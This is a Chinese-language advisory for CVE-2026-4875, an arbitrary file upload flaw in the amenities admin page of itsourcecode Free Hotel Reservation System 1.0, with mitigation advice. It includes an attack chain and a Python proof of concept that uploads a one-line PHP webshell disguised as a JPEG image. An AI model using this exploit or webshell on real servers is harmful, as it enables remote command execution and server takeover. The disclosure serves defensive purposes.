CVE-2026-4875 CVSS 4.7 中危

CVE-2026-4875 Free Hotel Reservation System 任意文件上传漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4875

漏洞类型

任意文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Free Hotel Reservation System

漏洞概述

itsourcecode Free Hotel Reservation System 1.0版本存在安全漏洞。该漏洞源于/admin/mod_amenities/index.php?view=add文件中对image参数的处理存在缺陷。由于未对上传文件进行严格限制，具有高权限的攻击者可利用此漏洞远程上传任意文件。此漏洞已被公开披露，可能对系统的机密性、完整性和可用性造成低程度影响。

技术细节

该漏洞属于典型的任意文件上传漏洞。在itsourcecode Free Hotel Reservation System 1.0的后台管理模块中，/admin/mod_amenities/index.php?view=add接口负责处理设施图片的添加功能。系统在处理image参数时，未对上传文件的类型、后缀名及内容进行严格的安全校验。攻击者虽然需要具备高权限（如管理员账号）才能访问该功能，但一旦登录，即可构造恶意HTTP请求，将包含恶意代码的脚本（如PHP Webshell）伪装成图片进行上传。由于服务器端未能正确识别并拦截此类文件，攻击者可成功上传文件至服务器，进而导致服务器被控制或敏感信息泄露。

攻击链分析

STEP 1

步骤1

攻击者进行侦察，确定目标正在使用itsourcecode Free Hotel Reservation System 1.0，并获取管理员账户凭证（利用高权限要求PR:H）。

STEP 2

步骤2

攻击者使用管理员身份登录后台系统，访问存在漏洞的页面/admin/mod_amenities/index.php?view=add。

STEP 3

步骤3

攻击者构造包含恶意代码（如PHP Webshell）的文件，并通过修改image参数向服务器发送POST请求上传该文件。

STEP 4

步骤4

服务器由于缺乏校验，成功保存恶意文件。攻击者通过浏览器访问该文件路径，执行任意系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/admin/mod_amenities/index.php?view=add"

# Attacker's session cookie (Admin privilege required)
cookies = {
    "PHPSESSID": "attacker_session_id"
}

# Malicious file payload (PHP webshell)
# Note: The vulnerability allows unrestricted upload, so extension validation is bypassed
files = {
    'image': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'image/jpeg')
}

# Additional data if required by the form
data = {
    'submit': 'Upload'
}

response = requests.post(url, cookies=cookies, files=files, data=data)

if response.status_code == 200:
    print("[+] Exploit successful! File uploaded.")
    print("[+] Check the upload directory to access the shell.")
else:
    print("[-] Exploit failed.")

影响范围

itsourcecode Free Hotel Reservation System 1.0

防御指南

临时缓解措施

建议立即检查服务器中是否存在异常的可疑文件，特别是在/admin/mod_amenities/相关目录下。临时可通过配置Web服务器（如Apache/Nginx），禁止在上传目录执行PHP等脚本文件。同时，加强管理员账户的安全策略，防止凭证泄露导致未授权访问。等待官方发布安全补丁后立即进行升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4875
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4875
3 Details https://www.cvedetails.com/cve/CVE-2026-4875/
4 VulDB https://vuldb.com/cve/CVE-2026-4875
5 Link https://github.com/bybinyu/Vulnerability-Practice/issues/4
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.353558
8 Link https://vuldb.com/?id.353558
9 Link https://vuldb.com/?submit.776245

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表